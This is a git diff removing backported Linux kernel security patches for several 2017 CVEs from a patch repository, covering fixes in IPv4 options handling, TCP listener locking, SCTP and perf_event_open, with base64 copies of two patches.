--	  If you say Y here, additional code will be inserted into the
--	  timer routines to collect statistics about kernel timers being
--	  reprogrammed. The statistics can be read from /proc/timer_stats.
--	  The statistics collection is started by writing 1 to /proc/timer_stats,
--	  writing 0 stops it. This feature is useful to collect information
--	  about timer usage patterns in kernel and userspace. This feature
--	  is lightweight if enabled in the kernel config but not activated
--	  (it defaults to deactivated on bootup and will only be activated
--	  if some application like powertop activates it explicitly).
--
- config DEBUG_PREEMPT
- 	bool "Debug preemptible kernel"
- 	depends on DEBUG_KERNEL && PREEMPT && TRACE_IRQFLAGS_SUPPORT
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-5970/^4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-5970/^4.9/0001.patch
deleted file mode 100644
index 4ba73cae..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5970/^4.9/0001.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From 34b2cef20f19c87999fff3da4071e66937db9644 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Sat, 4 Feb 2017 11:16:52 -0800
-Subject: ipv4: keep skb->dst around in presence of IP options
-
-Andrey Konovalov got crashes in __ip_options_echo() when a NULL skb->dst
-is accessed.
-
-ipv4_pktinfo_prepare() should not drop the dst if (evil) IP options
-are present.
-
-We could refine the test to the presence of ts_needtime or srr,
-but IP options are not often used, so let's be conservative.
-
-Thanks to syzkaller team for finding this bug.
-
-Fixes: d826eb14ecef ("ipv4: PKTINFO doesnt need dst reference")
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipv4/ip_sockglue.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/net/ipv4/ip_sockglue.c b/net/ipv4/ip_sockglue.c
-index 53ae0c6..9000117 100644
---- a/net/ipv4/ip_sockglue.c
-+++ b/net/ipv4/ip_sockglue.c
-@@ -1238,7 +1238,14 @@ void ipv4_pktinfo_prepare(const struct sock *sk, struct sk_buff *skb)
- 		pktinfo->ipi_ifindex = 0;
- 		pktinfo->ipi_spec_dst.s_addr = 0;
- 	}
--	skb_dst_drop(skb);
-+	/* We need to keep the dst for __ip_options_echo()
-+	 * We could restrict the test to opt.ts_needtime || opt.srr,
-+	 * but the following is good enough as IP options are not often used.
-+	 */
-+	if (unlikely(IPCB(skb)->opt.optlen))
-+		skb_dst_force(skb);
-+	else
-+		skb_dst_drop(skb);
- }
- 
- int ip_setsockopt(struct sock *sk, int level,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-5972/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-5972/ANY/0001.patch
deleted file mode 100644
index fc2e7e02..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5972/ANY/0001.patch
+++ /dev/null
@@ -1,112 +0,0 @@
-From e994b2f0fb9229aeff5eea9541320bd7b2ca8714 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Fri, 2 Oct 2015 11:43:39 -0700
-Subject: [PATCH] tcp: do not lock listener to process SYN packets
-
-Everything should now be ready to finally allow SYN
-packets processing without holding listener lock.
-
-Tested:
-
-3.5 Mpps SYNFLOOD. Plenty of cpu cycles available.
-
-Next bottleneck is the refcount taken on listener,
-that could be avoided if we remove SLAB_DESTROY_BY_RCU
-strict semantic for listeners, and use regular RCU.
-
-    13.18%  [kernel]  [k] __inet_lookup_listener
-     9.61%  [kernel]  [k] tcp_conn_request
-     8.16%  [kernel]  [k] sha_transform
-     5.30%  [kernel]  [k] inet_reqsk_alloc
-     4.22%  [kernel]  [k] sock_put
-     3.74%  [kernel]  [k] tcp_make_synack
-     2.88%  [kernel]  [k] ipt_do_table
-     2.56%  [kernel]  [k] memcpy_erms
-     2.53%  [kernel]  [k] sock_wfree
-     2.40%  [kernel]  [k] tcp_v4_rcv
-     2.08%  [kernel]  [k] fib_table_lookup
-     1.84%  [kernel]  [k] tcp_openreq_init_rwin
-
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipv4/tcp_ipv4.c | 11 +++++++++--
- net/ipv6/tcp_ipv6.c | 11 +++++++++--
- 2 files changed, 18 insertions(+), 4 deletions(-)
-
-diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
-index ac2ea73e9aafc..34310748a3655 100644
---- a/net/ipv4/tcp_ipv4.c
-+++ b/net/ipv4/tcp_ipv4.c
-@@ -1355,7 +1355,7 @@ static struct sock *tcp_v4_cookie_check(struct sock *sk, struct sk_buff *skb)
- }
- 
- /* The socket must have it's spinlock held when we get
-- * here.
-+ * here, unless it is a TCP_LISTEN socket.
-  *
-  * We have a potential double-lock case here, so even when
-  * doing backlog processing we use the BH locking scheme.
-@@ -1619,9 +1619,15 @@ int tcp_v4_rcv(struct sk_buff *skb)
- 	if (sk_filter(sk, skb))
- 		goto discard_and_relse;
- 
--	sk_incoming_cpu_update(sk);
- 	skb->dev = NULL;
- 
-+	if (sk->sk_state == TCP_LISTEN) {
-+		ret = tcp_v4_do_rcv(sk, skb);
-+		goto put_and_return;
-+	}
-+
-+	sk_incoming_cpu_update(sk);
-+
- 	bh_lock_sock_nested(sk);
- 	tcp_sk(sk)->segs_in += max_t(u16, 1, skb_shinfo(skb)->gso_segs);
- 	ret = 0;
-@@ -1636,6 +1642,7 @@ int tcp_v4_rcv(struct sk_buff *skb)
- 	}
- 	bh_unlock_sock(sk);
- 
-+put_and_return:
- 	sock_put(sk);
- 
- 	return ret;
-diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
-index 3d18571811c5e..33334f0c217de 100644
---- a/net/ipv6/tcp_ipv6.c
-+++ b/net/ipv6/tcp_ipv6.c
-@@ -1161,7 +1161,7 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
- }
- 
- /* The socket must have it's spinlock held when we get
-- * here.
-+ * here, unless it is a TCP_LISTEN socket.
-  *
-  * We have a potential double-lock case here, so even when
-  * doing backlog processing we use the BH locking scheme.
-@@ -1415,9 +1415,15 @@ static int tcp_v6_rcv(struct sk_buff *skb)
- 	if (sk_filter(sk, skb))
- 		goto discard_and_relse;
- 
--	sk_incoming_cpu_update(sk);
- 	skb->dev = NULL;
- 
-+	if (sk->sk_state == TCP_LISTEN) {
-+		ret = tcp_v6_do_rcv(sk, skb);
-+		goto put_and_return;
-+	}
-+
-+	sk_incoming_cpu_update(sk);
-+
- 	bh_lock_sock_nested(sk);
- 	tcp_sk(sk)->segs_in += max_t(u16, 1, skb_shinfo(skb)->gso_segs);
- 	ret = 0;
-@@ -1432,6 +1438,7 @@ static int tcp_v6_rcv(struct sk_buff *skb)
- 	}
- 	bh_unlock_sock(sk);
- 
-+put_and_return:
- 	sock_put(sk);
- 	return ret ? -1 : 0;
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-5972/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-5972/ANY/0002.patch
deleted file mode 100644
index 7a08c666..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5972/ANY/0002.patch
+++ /dev/null
@@ -1,25 +0,0 @@
-From b7b89be8d4ab0c5e6eb0cdfb1108af08a1cd088f Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Fri, 02 Oct 2015 11:43:29 -0700
-Subject: [PATCH] tcp: remove BUG_ON() in tcp_check_req()
-
-Once listener is lockless, its sk_state can change anytime.
-
-Change-Id: I3a8c4aa4974294b865d79ea997df4c8cee5ffbc2
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
-
-diff --git a/net/ipv4/tcp_minisocks.c b/net/ipv4/tcp_minisocks.c
-index 0f01788..28f72aa 100644
---- a/net/ipv4/tcp_minisocks.c
-+++ b/net/ipv4/tcp_minisocks.c
-@@ -511,8 +511,6 @@
- 	__be32 flg = tcp_flag_word(th) & (TCP_FLAG_RST|TCP_FLAG_SYN|TCP_FLAG_ACK);
- 	bool paws_reject = false;
- 
--	BUG_ON(fastopen == (sk->sk_state == TCP_LISTEN));
--
- 	tmp_opt.saw_tstamp = 0;
- 	if (th->doff > (sizeof(struct tcphdr)>>2)) {
- 		tcp_parse_options(skb, &tmp_opt, 0, NULL);
diff --git a/Patches/Linux_CVEs/CVE-2017-5972/ANY/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-5972/ANY/0002.patch.base64
deleted file mode 100644
index 4fa5d03d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5972/ANY/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSBiN2I4OWJlOGQ0YWIwYzVlNmViMGNkZmIxMTA4YWYwOGExY2QwODhmIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBFcmljIER1bWF6ZXQgPGVkdW1hemV0QGdvb2dsZS5jb20+CkRhdGU6IEZyaSwgMDIgT2N0IDIwMTUgMTE6NDM6MjkgLTA3MDAKU3ViamVjdDogW1BBVENIXSB0Y3A6IHJlbW92ZSBCVUdfT04oKSBpbiB0Y3BfY2hlY2tfcmVxKCkKCk9uY2UgbGlzdGVuZXIgaXMgbG9ja2xlc3MsIGl0cyBza19zdGF0ZSBjYW4gY2hhbmdlIGFueXRpbWUuCgpDaGFuZ2UtSWQ6IEkzYThjNGFhNDk3NDI5NGI4NjVkNzllYTk5N2RmNGM4Y2VlNWZmYmMyClNpZ25lZC1vZmYtYnk6IEVyaWMgRHVtYXpldCA8ZWR1bWF6ZXRAZ29vZ2xlLmNvbT4KU2lnbmVkLW9mZi1ieTogRGF2aWQgUy4gTWlsbGVyIDxkYXZlbUBkYXZlbWxvZnQubmV0PgotLS0KCmRpZmYgLS1naXQgYS9uZXQvaXB2NC90Y3BfbWluaXNvY2tzLmMgYi9uZXQvaXB2NC90Y3BfbWluaXNvY2tzLmMKaW5kZXggMGYwMTc4OC4uMjhmNzJhYSAxMDA2NDQKLS0tIGEvbmV0L2lwdjQvdGNwX21pbmlzb2Nrcy5jCisrKyBiL25ldC9pcHY0L3RjcF9taW5pc29ja3MuYwpAQCAtNTExLDggKzUxMSw2IEBACiAJX19iZTMyIGZsZyA9IHRjcF9mbGFnX3dvcmQodGgpICYgKFRDUF9GTEFHX1JTVHxUQ1BfRkxBR19TWU58VENQX0ZMQUdfQUNLKTsKIAlib29sIHBhd3NfcmVqZWN0ID0gZmFsc2U7CiAKLQlCVUdfT04oZmFzdG9wZW4gPT0gKHNrLT5za19zdGF0ZSA9PSBUQ1BfTElTVEVOKSk7Ci0KIAl0bXBfb3B0LnNhd190c3RhbXAgPSAwOwogCWlmICh0aC0+ZG9mZiA+IChzaXplb2Yoc3RydWN0IHRjcGhkcik+PjIpKSB7CiAJCXRjcF9wYXJzZV9vcHRpb25zKHNrYiwgJnRtcF9vcHQsIDAsIE5VTEwpOwo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-5986/^4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-5986/^4.9/0001.patch
deleted file mode 100644
index 8dfe30ea..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5986/^4.9/0001.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 2dcab598484185dea7ec22219c76dcdd59e3cb90 Mon Sep 17 00:00:00 2001
-From: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
-Date: Mon, 6 Feb 2017 18:10:31 -0200
-Subject: sctp: avoid BUG_ON on sctp_wait_for_sndbuf
-
-Alexander Popov reported that an application may trigger a BUG_ON in
-sctp_wait_for_sndbuf if the socket tx buffer is full, a thread is
-waiting on it to queue more data and meanwhile another thread peels off
-the association being used by the first thread.
-
-This patch replaces the BUG_ON call with a proper error handling. It
-will return -EPIPE to the original sendmsg call, similarly to what would
-have been done if the association wasn't found in the first place.
-
-Acked-by: Alexander Popov <alex.popov@linux.com>
-Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
-Reviewed-by: Xin Long <lucien.xin@gmail.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/sctp/socket.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/net/sctp/socket.c b/net/sctp/socket.c
-index 37eeab7..e214d2e 100644
---- a/net/sctp/socket.c
-+++ b/net/sctp/socket.c
-@@ -7426,7 +7426,8 @@ static int sctp_wait_for_sndbuf(struct sctp_association *asoc, long *timeo_p,
- 		 */
- 		release_sock(sk);
- 		current_timeo = schedule_timeout(current_timeo);
--		BUG_ON(sk != asoc->base.sk);
-+		if (sk != asoc->base.sk)
-+			goto do_error;
- 		lock_sock(sk);
- 
- 		*timeo_p = current_timeo;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6001/3.2-3.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-6001/3.2-3.4/0001.patch
deleted file mode 100644
index a9442471..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6001/3.2-3.4/0001.patch
+++ /dev/null
@@ -1,159 +0,0 @@
-From 9eb0e01be831d0f37ea6278a92c32424141f55fb Mon Sep 17 00:00:00 2001
-From: Peter Zijlstra <peterz@infradead.org>
-Date: Wed, 11 Jan 2017 21:09:50 +0100
-Subject: perf/core: Fix concurrent sys_perf_event_open() vs. 'move_group' race
-
-commit 321027c1fe77f892f4ea07846aeae08cefbbb290 upstream.
-
-Di Shen reported a race between two concurrent sys_perf_event_open()
-calls where both try and move the same pre-existing software group
-into a hardware context.
-
-The problem is exactly that described in commit:
-
-  f63a8daa5812 ("perf: Fix event->ctx locking")
-
-... where, while we wait for a ctx->mutex acquisition, the event->ctx
-relation can have changed under us.
-
-That very same commit failed to recognise sys_perf_event_context() as an
-external access vector to the events and thereby didn't apply the
-established locking rules correctly.
-
-So while one sys_perf_event_open() call is stuck waiting on
-mutex_lock_double(), the other (which owns said locks) moves the group
-about. So by the time the former sys_perf_event_open() acquires the
-locks, the context we've acquired is stale (and possibly dead).
-
-Apply the established locking rules as per perf_event_ctx_lock_nested()
-to the mutex_lock_double() for the 'move_group' case. This obviously means
-we need to validate state after we acquire the locks.
-
-Reported-by: Di Shen (Keen Lab)
-Tested-by: John Dias <joaodias@google.com>
-Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
-Cc: Alexander Shishkin <alexander.shishkin@linux.intel.com>
-Cc: Arnaldo Carvalho de Melo <acme@kernel.org>
-Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
-Cc: Jiri Olsa <jolsa@redhat.com>
-Cc: Kees Cook <keescook@chromium.org>
-Cc: Linus Torvalds <torvalds@linux-foundation.org>
-Cc: Min Chong <mchong@google.com>
-Cc: Peter Zijlstra <peterz@infradead.org>
-Cc: Stephane Eranian <eranian@google.com>
-Cc: Thomas Gleixner <tglx@linutronix.de>
-Cc: Vince Weaver <vincent.weaver@maine.edu>
-Fixes: f63a8daa5812 ("perf: Fix event->ctx locking")
-Link: http://lkml.kernel.org/r/20170106131444.GZ3174@twins.programming.kicks-ass.net
-Signed-off-by: Ingo Molnar <mingo@kernel.org>
-[bwh: Backported to 3.2:
- - Use ACCESS_ONCE() instead of READ_ONCE()
- - Test perf_event::group_flags instead of group_caps
- - Add the err_locked cleanup block, which we didn't need before
- - Adjust context]
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- kernel/events/core.c | 61 ++++++++++++++++++++++++++++++++++++++++++++++++----
- 1 file changed, 57 insertions(+), 4 deletions(-)
-
-diff --git a/kernel/events/core.c b/kernel/events/core.c
-index a301c68..49a1db4 100644
---- a/kernel/events/core.c
-+++ b/kernel/events/core.c
-@@ -6474,6 +6474,37 @@ static void mutex_lock_double(struct mutex *a, struct mutex *b)
- 	mutex_lock_nested(b, SINGLE_DEPTH_NESTING);
- }
- 
-+/*
-+ * Variation on perf_event_ctx_lock_nested(), except we take two context
-+ * mutexes.
-+ */
-+static struct perf_event_context *
-+__perf_event_ctx_lock_double(struct perf_event *group_leader,
-+			     struct perf_event_context *ctx)
-+{
-+	struct perf_event_context *gctx;
-+
-+again:
-+	rcu_read_lock();
-+	gctx = ACCESS_ONCE(group_leader->ctx);
-+	if (!atomic_inc_not_zero(&gctx->refcount)) {
-+		rcu_read_unlock();
-+		goto again;
-+	}
-+	rcu_read_unlock();
-+
-+	mutex_lock_double(&gctx->mutex, &ctx->mutex);
-+
-+	if (group_leader->ctx != gctx) {
-+		mutex_unlock(&ctx->mutex);
-+		mutex_unlock(&gctx->mutex);
-+		put_ctx(gctx);
-+		goto again;
-+	}
-+
-+	return gctx;
-+}
-+
- /**
-  * sys_perf_event_open - open a performance event, associate it to a task/cpu
-  *
-@@ -6661,14 +6692,31 @@ SYSCALL_DEFINE5(perf_event_open,
- 	}
- 
- 	if (move_group) {
--		gctx = group_leader->ctx;
-+		gctx = __perf_event_ctx_lock_double(group_leader, ctx);
-+
-+		/*
-+		 * Check if we raced against another sys_perf_event_open() call
-+		 * moving the software group underneath us.
-+		 */
-+		if (!(group_leader->group_flags & PERF_GROUP_SOFTWARE)) {
-+			/*
-+			 * If someone moved the group out from under us, check
-+			 * if this new event wound up on the same ctx, if so
-+			 * its the regular !move_group case, otherwise fail.
-+			 */
-+			if (gctx != ctx) {
-+				err = -EINVAL;
-+				goto err_locked;
-+			} else {
-+				perf_event_ctx_unlock(group_leader, gctx);
-+				move_group = 0;
-+			}
-+		}
- 
- 		/*
- 		 * See perf_event_ctx_lock() for comments on the details
- 		 * of swizzling perf_event::ctx.
- 		 */
--		mutex_lock_double(&gctx->mutex, &ctx->mutex);
--
- 		perf_remove_from_context(group_leader, false);
- 
- 		/*
-@@ -6710,7 +6758,7 @@ SYSCALL_DEFINE5(perf_event_open,
- 	perf_unpin_context(ctx);
- 
- 	if (move_group) {
--		mutex_unlock(&gctx->mutex);
-+		perf_event_ctx_unlock(group_leader, gctx);
- 		put_ctx(gctx);
- 	}
- 	mutex_unlock(&ctx->mutex);
-@@ -6737,6 +6785,11 @@ SYSCALL_DEFINE5(perf_event_open,
- 	fd_install(event_fd, event_file);
- 	return event_fd;
- 
-+err_locked:
-+	if (move_group)
-+		perf_event_ctx_unlock(group_leader, gctx);
-+	mutex_unlock(&ctx->mutex);
-+	fput(event_file);
- err_context:
- 	perf_unpin_context(ctx);
- 	put_ctx(ctx);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6001/^4.9/0002.patch b/Patches/Linux_CVEs/CVE-2017-6001/^4.9/0002.patch
deleted file mode 100644
index c4fd6944..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6001/^4.9/0002.patch
+++ /dev/null
@@ -1,157 +0,0 @@
-From 857ea07fb0096e0964ced18ad85a1d9591562114 Mon Sep 17 00:00:00 2001
-From: Peter Zijlstra <peterz@infradead.org>
-Date: Wed, 11 Jan 2017 21:09:50 +0100
-Subject: [PATCH] perf/core: Fix concurrent sys_perf_event_open() vs. 'move_group' race
-
-commit 321027c1fe77f892f4ea07846aeae08cefbbb290 upstream.
-commit fe525a280e8b5f04c7666fe22d1a4ef592f7b953 in 3.16.40
-bug: 37901413
-
-Di Shen reported a race between two concurrent sys_perf_event_open()
-calls where both try and move the same pre-existing software group
-into a hardware context.
-
-The problem is exactly that described in commit:
-
-  f63a8daa5812 ("perf: Fix event->ctx locking")
-
-... where, while we wait for a ctx->mutex acquisition, the event->ctx
-relation can have changed under us.
-
-That very same commit failed to recognise sys_perf_event_context() as an
-external access vector to the events and thereby didn't apply the
-established locking rules correctly.
-
-So while one sys_perf_event_open() call is stuck waiting on
-mutex_lock_double(), the other (which owns said locks) moves the group
-about. So by the time the former sys_perf_event_open() acquires the
-locks, the context we've acquired is stale (and possibly dead).
-
-Apply the established locking rules as per perf_event_ctx_lock_nested()
-to the mutex_lock_double() for the 'move_group' case. This obviously means
-we need to validate state after we acquire the locks.
-
-Reported-by: Di Shen (Keen Lab)
-Tested-by: John Dias <joaodias@google.com>
-Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
-Cc: Alexander Shishkin <alexander.shishkin@linux.intel.com>
-Cc: Arnaldo Carvalho de Melo <acme@kernel.org>
-Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
-Cc: Jiri Olsa <jolsa@redhat.com>
-Cc: Kees Cook <keescook@chromium.org>
-Cc: Linus Torvalds <torvalds@linux-foundation.org>
-Cc: Min Chong <mchong@google.com>
-Cc: Peter Zijlstra <peterz@infradead.org>
-Cc: Stephane Eranian <eranian@google.com>
-Cc: Thomas Gleixner <tglx@linutronix.de>
-Cc: Vince Weaver <vincent.weaver@maine.edu>
-Fixes: f63a8daa5812 ("perf: Fix event->ctx locking")
-Link: http://lkml.kernel.org/r/20170106131444.GZ3174@twins.programming.kicks-ass.net
-Signed-off-by: Ingo Molnar <mingo@kernel.org>
-[bwh: Backported to 3.16:
- - Use ACCESS_ONCE() instead of READ_ONCE()
- - Test perf_event::group_flags instead of group_caps
- - Add the err_locked cleanup block, which we didn't need before
- - Adjust context]
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
-Signed-off-by: Suren Baghdasaryan <surenb@google.com>
----
-
-diff --git a/kernel/events/core.c b/kernel/events/core.c
-index 1a0530f..1c53a5c 100644
---- a/kernel/events/core.c
-+++ b/kernel/events/core.c
-@@ -7440,6 +7440,37 @@
- 	mutex_lock_nested(b, SINGLE_DEPTH_NESTING);
- }
- 
-+/*
-+ * Variation on perf_event_ctx_lock_nested(), except we take two context
-+ * mutexes.
-+ */
-+static struct perf_event_context *
-+__perf_event_ctx_lock_double(struct perf_event *group_leader,
-+			     struct perf_event_context *ctx)
-+{
-+	struct perf_event_context *gctx;
-+
-+again:
-+	rcu_read_lock();
-+	gctx = ACCESS_ONCE(group_leader->ctx);
-+	if (!atomic_inc_not_zero(&gctx->refcount)) {
-+		rcu_read_unlock();
-+		goto again;
-+	}
-+	rcu_read_unlock();
-+
-+	mutex_lock_double(&gctx->mutex, &ctx->mutex);
-+
-+	if (group_leader->ctx != gctx) {
-+		mutex_unlock(&ctx->mutex);
-+		mutex_unlock(&gctx->mutex);
-+		put_ctx(gctx);
-+		goto again;
-+	}
-+
-+	return gctx;
-+}
-+
- /**
-  * sys_perf_event_open - open a performance event, associate it to a task/cpu
-  *
-@@ -7656,14 +7687,31 @@
- 	}
- 
- 	if (move_group) {
--		gctx = group_leader->ctx;
-+		gctx = __perf_event_ctx_lock_double(group_leader, ctx);
-+
-+		/*
-+		 * Check if we raced against another sys_perf_event_open() call
-+		 * moving the software group underneath us.
-+		 */
-+		if (!(group_leader->group_flags & PERF_GROUP_SOFTWARE)) {
-+			/*
-+			 * If someone moved the group out from under us, check
-+			 * if this new event wound up on the same ctx, if so
-+			 * its the regular !move_group case, otherwise fail.
-+			 */
-+			if (gctx != ctx) {
-+				err = -EINVAL;
-+				goto err_locked;
-+			} else {
-+				perf_event_ctx_unlock(group_leader, gctx);
-+				move_group = 0;
-+			}
-+		}
- 
- 		/*
- 		 * See perf_event_ctx_lock() for comments on the details
- 		 * of swizzling perf_event::ctx.
- 		 */
--		mutex_lock_double(&gctx->mutex, &ctx->mutex);
--
- 		perf_remove_from_context(group_leader, false);
- 
- 		/*
-@@ -7704,7 +7752,7 @@
- 	perf_unpin_context(ctx);
- 
- 	if (move_group) {
--		mutex_unlock(&gctx->mutex);
-+		perf_event_ctx_unlock(group_leader, gctx);
- 		put_ctx(gctx);
- 	}
- 	mutex_unlock(&ctx->mutex);
-@@ -7733,6 +7781,11 @@
- 	fd_install(event_fd, event_file);
- 	return event_fd;
- 
-+err_locked:
-+	if (move_group)
-+		perf_event_ctx_unlock(group_leader, gctx);
-+	mutex_unlock(&ctx->mutex);
-+	fput(event_file);
- err_context:
- 	perf_unpin_context(ctx);
- 	put_ctx(ctx);
diff --git a/Patches/Linux_CVEs/CVE-2017-6001/^4.9/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-6001/^4.9/0002.patch.base64
deleted file mode 100644
index feef43bd..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6001/^4.9/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSA4NTdlYTA3ZmIwMDk2ZTA5NjRjZWQxOGFkODVhMWQ5NTkxNTYyMTE0IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBQZXRlciBaaWpsc3RyYSA8cGV0ZXJ6QGluZnJhZGVhZC5vcmc+CkRhdGU6IFdlZCwgMTEgSmFuIDIwMTcgMjE6MDk6NTAgKzAxMDAKU3ViamVjdDogW1BBVENIXSBwZXJmL2NvcmU6IEZpeCBjb25jdXJyZW50IHN5c19wZXJmX2V2ZW50X29wZW4oKSB2cy4gJ21vdmVfZ3JvdXAnIHJhY2UKCmNvbW1pdCAzMjEwMjdjMWZlNzdmODkyZjRlYTA3ODQ2YWVhZTA4Y2VmYmJiMjkwIHVwc3RyZWFtLgpjb21taXQgZmU1MjVhMjgwZThiNWYwNGM3NjY2ZmUyMmQxYTRlZjU5MmY3Yjk1MyBpbiAzLjE2LjQwCmJ1ZzogMzc5MDE0MTMKCkRpIFNoZW4gcmVwb3J0ZWQgYSByYWNlIGJldHdlZW4gdHdvIGNvbmN1cnJlbnQgc3lzX3BlcmZfZXZlbnRfb3BlbigpCmNhbGxzIHdoZXJlIGJvdGggdHJ5IGFuZCBtb3ZlIHRoZSBzYW1lIHByZS1leGlzdGluZyBzb2Z0d2FyZSBncm91cAppbnRvIGEgaGFyZHdhcmUgY29udGV4dC4KClRoZSBwcm9ibGVtIGlzIGV4YWN0bHkgdGhhdCBkZXNjcmliZWQgaW4gY29tbWl0OgoKICBmNjNhOGRhYTU4MTIgKCJwZXJmOiBGaXggZXZlbnQtPmN0eCBsb2NraW5nIikKCi4uLiB3aGVyZSwgd2hpbGUgd2Ugd2FpdCBmb3IgYSBjdHgtPm11dGV4IGFjcXVpc2l0aW9uLCB0aGUgZXZlbnQtPmN0eApyZWxhdGlvbiBjYW4gaGF2ZSBjaGFuZ2VkIHVuZGVyIHVzLgoKVGhhdCB2ZXJ5IHNhbWUgY29tbWl0IGZhaWxlZCB0byByZWNvZ25pc2Ugc3lzX3BlcmZfZXZlbnRfY29udGV4dCgpIGFzIGFuCmV4dGVybmFsIGFjY2VzcyB2ZWN0b3IgdG8gdGhlIGV2ZW50cyBhbmQgdGhlcmVieSBkaWRuJ3QgYXBwbHkgdGhlCmVzdGFibGlzaGVkIGxvY2tpbmcgcnVsZXMgY29ycmVjdGx5LgoKU28gd2hpbGUgb25lIHN5c19wZXJmX2V2ZW50X29wZW4oKSBjYWxsIGlzIHN0dWNrIHdhaXRpbmcgb24KbXV0ZXhfbG9ja19kb3VibGUoKSwgdGhlIG90aGVyICh3aGljaCBvd25zIHNhaWQgbG9ja3MpIG1vdmVzIHRoZSBncm91cAphYm91dC4gU28gYnkgdGhlIHRpbWUgdGhlIGZvcm1lciBzeXNfcGVyZl9ldmVudF9vcGVuKCkgYWNxdWlyZXMgdGhlCmxvY2tzLCB0aGUgY29udGV4dCB3ZSd2ZSBhY3F1aXJlZCBpcyBzdGFsZSAoYW5kIHBvc3NpYmx5IGRlYWQpLgoKQXBwbHkgdGhlIGVzdGFibGlzaGVkIGxvY2tpbmcgcnVsZXMgYXMgcGVyIHBlcmZfZXZlbnRfY3R4X2xvY2tfbmVzdGVkKCkKdG8gdGhlIG11dGV4X2xvY2tfZG91YmxlKCkgZm9yIHRoZSAnbW92ZV9ncm91cCcgY2FzZS4gVGhpcyBvYnZpb3VzbHkgbWVhbnMKd2UgbmVlZCB0byB2YWxpZGF0ZSBzdGF0ZSBhZnRlciB3ZSBhY3F1aXJlIHRoZSBsb2Nrcy4KClJlcG9ydGVkLWJ5OiBEaSBTaGVuIChLZWVuIExhYikKVGVzdGVkLWJ5OiBKb2huIERpYXMgPGpvYW9kaWFzQGdvb2dsZS5jb20+ClNpZ25lZC1vZmYtYnk6IFBldGVyIFppamxzdHJhIChJbnRlbCkgPHBldGVyekBpbmZyYWRlYWQub3JnPgpDYzogQWxleGFuZGVyIFNoaXNoa2luIDxhbGV4YW5kZXIuc2hpc2hraW5AbGludXguaW50ZWwuY29tPgpDYzogQXJuYWxkbyBDYXJ2YWxobyBkZSBNZWxvIDxhY21lQGtlcm5lbC5vcmc+CkNjOiBBcm5hbGRvIENhcnZhbGhvIGRlIE1lbG8gPGFjbWVAcmVkaGF0LmNvbT4KQ2M6IEppcmkgT2xzYSA8am9sc2FAcmVkaGF0LmNvbT4KQ2M6IEtlZXMgQ29vayA8a2Vlc2Nvb2tAY2hyb21pdW0ub3JnPgpDYzogTGludXMgVG9ydmFsZHMgPHRvcnZhbGRzQGxpbnV4LWZvdW5kYXRpb24ub3JnPgpDYzogTWluIENob25nIDxtY2hvbmdAZ29vZ2xlLmNvbT4KQ2M6IFBldGVyIFppamxzdHJhIDxwZXRlcnpAaW5mcmFkZWFkLm9yZz4KQ2M6IFN0ZXBoYW5lIEVyYW5pYW4gPGVyYW5pYW5AZ29vZ2xlLmNvbT4KQ2M6IFRob21hcyBHbGVpeG5lciA8dGdseEBsaW51dHJvbml4LmRlPgpDYzogVmluY2UgV2VhdmVyIDx2aW5jZW50LndlYXZlckBtYWluZS5lZHU+CkZpeGVzOiBmNjNhOGRhYTU4MTIgKCJwZXJmOiBGaXggZXZlbnQtPmN0eCBsb2NraW5nIikKTGluazogaHR0cDovL2xrbWwua2VybmVsLm9yZy9yLzIwMTcwMTA2MTMx